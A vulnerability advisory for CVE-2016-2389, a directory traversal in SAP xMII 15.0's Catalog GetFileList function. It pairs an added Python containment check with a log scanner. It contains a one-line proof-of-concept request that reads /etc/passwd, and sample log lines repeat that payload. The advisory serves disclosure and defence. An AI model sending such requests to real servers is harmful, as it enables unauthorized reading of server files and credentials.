Application: SAP xMII
Versions Affected: SAP MII 15.0
Vendor URL: SAP
Bugs: Directory traversal
Reported: 29.07.2015
Vendor response: 30.07.2015
Date of Public Advisory: 09.02.2016
Reference: SAP Security Note 2230978
Author: Dmitry Chastuhin (ERPScan)
VULNERABILITY INFORMATION
Class: [CWE-36]
Impact: SAP xMII directory traversal, read file from server
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-2389
CVSS Information
CVSS Base Score v3: 7.5 / 10
CVSS Base Vector:
Metric | Value
---|---
AV : Access Vector (Related exploit range) | Network (N)
AC : Access Complexity (Required attack complexity) | Low (L)
Au : Authentication (Level of authentication needed to exploit) | None (N)
C : Impact to Confidentiality | High (H)
I : Impact to Integrity | None (N)
A : Impact to Availability | None (N)
Description
An attacker can use a specially crafted request to read files from the server and use their contents to escalate privileges.
Business risk
A directory traversal vulnerability lets an attacker access arbitrary files and directories on the SAP server's filesystem, including application source code, configuration, and system files, and thereby obtain critical technical and business-related information stored in the vulnerable SAP system.
VULNERABLE PACKAGES
SAP MII 15.0
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2230978.
TECHNICAL DESCRIPTION
An attacker can use the xMII Catalog function GetFileList to read arbitrary files from the server.
PoC
GET /XMII/Catalog?Mode=GetFileList&Path=Classes/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd
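The defect class above (traversal through the Path parameter of GetFileList) is normally closed by resolving the caller-supplied path against the catalog root and rejecting anything that lands outside it. The following added example, not SAP's code, shows such a containment check and a log scan that flags GetFileList requests whose Path escapes the root; the catalog root and the access-log lines are constructed for the example.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Catalog root used by this example; the real xMII location is an assumption.
CATALOG_ROOT = "/usr/sap/xmii/catalog"

def resolve_catalog_path(requested, root=CATALOG_ROOT):
    """Return the resolved path if it stays inside root, else None.

    Containment check that closes a CWE-36 style defect: collapse '.' and
    '..' in the caller-supplied value and require the result to stay under root.
    """
    # The query parser already decoded once; decoding again catches
    # double-encoded sequences. Backslashes are treated as separators.
    candidate = unquote(requested).replace("\\", "/")
    resolved = posixpath.normpath(posixpath.join(root, candidate.lstrip("/")))
    if resolved == root or resolved.startswith(root.rstrip("/") + "/"):
        return resolved
    return None

# Traversal markers to flag in logs: plain, backslash and URL-encoded '..'.
TRAVERSAL = re.compile(r"\.\./|\.\.\\|%2e%2e", re.IGNORECASE)

def flag_getfilelist_requests(log_lines):
    """Return (line_no, Path) for GetFileList requests that escape the root."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        parts = line.split()
        if len(parts) < 2 or parts[0] != "GET":
            continue
        url = urlsplit(parts[1])
        if not url.path.startswith("/XMII/Catalog"):
            continue
        qs = parse_qs(url.query)
        if qs.get("Mode", [""])[0] != "GetFileList":
            continue
        path = qs.get("Path", [""])[0]
        if resolve_catalog_path(path) is None or TRAVERSAL.search(path):
            hits.append((n, path))
    return hits

# Constructed sample access-log lines, not taken from any real system.
SAMPLE_LOG = [
    "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/Reports HTTP/1.1",
    "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../etc/passwd HTTP/1.1",
    "GET /XMII/Catalog?Mode=GetFileList&Path=Classes%2f..%2f..%2fsecret HTTP/1.1",
    "GET /XMII/Illuminator?Mode=Ping HTTP/1.1",
]
```

Running `flag_getfilelist_requests(SAMPLE_LOG)` flags lines 2 and 3 only; the in-root request and the unrelated Illuminator request are left alone.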